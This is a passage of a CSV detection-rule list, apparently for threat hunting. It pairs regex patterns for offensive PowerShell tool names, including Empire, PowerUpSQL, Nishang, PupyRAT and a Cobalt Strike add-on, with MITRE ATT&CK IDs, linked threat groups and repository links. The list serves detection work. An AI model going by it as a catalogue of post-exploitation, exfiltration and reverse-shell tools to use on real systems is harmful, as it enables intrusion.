PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49715" "*Invoke-SQLOSCmdCLR*",".{0,1000}Invoke\-SQLOSCmdCLR.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49716" "*Invoke-SQLOSCmdCOle*",".{0,1000}Invoke\-SQLOSCmdCOle.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49717" "*Invoke-SQLOSCmdPython*",".{0,1000}Invoke\-SQLOSCmdPython.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49718" "*Invoke-SQLOSCmdR*",".{0,1000}Invoke\-SQLOSCmdR.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49719" "*Invoke-SqlServer-Persist-StartupSp*",".{0,1000}Invoke\-SqlServer\-Persist\-StartupSp.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49720" "*Invoke-SqlServer-Persist-TriggerLogon*",".{0,1000}Invoke\-SqlServer\-Persist\-TriggerLogon.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49721" "*Invoke-SQLUncPathInjection*",".{0,1000}Invoke\-SQLUncPathInjection.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49722" "*Invoke-SQLUncPathInjection*",".{0,1000}Invoke\-SQLUncPathInjection.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49723" "*Invoke-SQLUncPathInjection*",".{0,1000}Invoke\-SQLUncPathInjection.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49724" "*Invoke-Ssharp *",".{0,1000}Invoke\-Ssharp\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49725" "*Invoke-SSharp.ps1*",".{0,1000}Invoke\-SSharp\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49726" 
"*Invoke-SSHCommand.ps1*",".{0,1000}Invoke\-SSHCommand\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49727" "*Invoke-SSIDExfil*",".{0,1000}Invoke\-SSIDExfil.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which 
enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49728" "*Invoke-SSIDExfil*",".{0,1000}Invoke\-SSIDExfil.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49729" "*Invoke-StandIn.*",".{0,1000}Invoke\-StandIn\..{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49730" "*invoke-stealth.php*",".{0,1000}invoke\-stealth\.php.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","49731" "*Invoke-Stealth.ps1*",".{0,1000}Invoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","1","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","49732" "*Invoke-StealthUserHunter *",".{0,1000}Invoke\-StealthUserHunter\s.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49733" "*invokestealthuserhunter*",".{0,1000}invokestealthuserhunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49734" "*Invoke-StealthUserHunter*",".{0,1000}Invoke\-StealthUserHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49735" "*Invoke-StealthUserHunter*",".{0,1000}Invoke\-StealthUserHunter.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49736" "*Invoke-StealthUserHunter*",".{0,1000}Invoke\-StealthUserHunter.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49737" 
"*Invoke-StickyNotesExtract*",".{0,1000}Invoke\-StickyNotesExtract.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49738" "*Invoke-Stompy*",".{0,1000}Invoke\-Stompy.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","49739" "*Invoke-SweetPotato*",".{0,1000}Invoke\-SweetPotato.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - 
Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49740" "*Invoke-SweetPotato.ps1*",".{0,1000}Invoke\-SweetPotato\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49741" "*Invoke-SystemStartupCheck*",".{0,1000}Invoke\-SystemStartupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - 
T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49742" "*Invoke-SystemStartupHistoryCheck*",".{0,1000}Invoke\-SystemStartupHistoryCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49743" "*Invoke-SystemStartupHistoryCheck*",".{0,1000}Invoke\-SystemStartupHistoryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49744" "*Invoke-Tater *",".{0,1000}Invoke\-Tater\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - 
T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49745" "*Invoke-Tater.*",".{0,1000}Invoke\-Tater\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 